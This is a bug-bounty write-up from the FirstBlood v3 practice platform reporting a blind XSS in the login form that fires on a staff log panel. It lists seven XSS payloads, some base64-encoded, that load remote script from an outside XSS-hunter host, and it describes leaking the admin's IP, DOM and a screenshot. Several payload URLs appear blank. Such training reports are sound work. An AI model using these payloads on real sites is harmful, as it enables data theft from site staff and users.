FirstBlood-#1310Blind XSS on login page disclosing admin panel access
This issue was discovered on FirstBlood v3

On 2022-12-09, ar6aaz Level 3 reported:

Hello Team,

I have found a Blind XSS vulnerability on Firstbloodv3. When you visit the login page, you will notice the message "Login attempts will be logged".

That made me think there could either be a Blind XSS or Log4j bug here. The application being built on PHP rules out Log4j, so I tried Blind XSS and it worked.

Steps to Reproduce:

  1. Go to the login page.
  2. Enter Blind XSS payload in the username/password fields.

You will receive a notification of your Blind XSS being fired in your inbox. The XSS fires on

You can create Blind XSS payloads by self hosting XSS hunter or by using an account on Some sample payloads that can be used and worked for me:

  1. "><script src=></script>
  2. javascript:eval('var a=document.createElement(\'script\');a.src=\'\';document.body.appendChild(a)')
  3. "><input onfocus=eval(atob( id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
  4. "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(>
  5. "><video><source onerror=eval(atob( id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
  6. "><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="";parent.document.body.appendChild(a);</script>">
  7. <script>$.getScript("//")</script>

Impact: We are able to get a screenshot of admin panel where XSS gets fired for user Administrator-Sean. Along with that, the Blind XSS also leaks other information like:

  1. IP address:
  2. Entire DOM data
  3. Screenshot of Admin panel:


Endpoint: /login.php

Parameter: username/password

Payload: "><script src=></script>

FirstBlood ID: 72
Vulnerability Type: Stored XSS

Login attempts were logged on an internal panel on and the username is vulnerable to blind XSS affecting FirstBlood staff

Report Feedback


Creator & Administrator

Congratulations, you were the second user to report this! For finding this you have won yourself a LIMITED edition BugBountyHunter hat!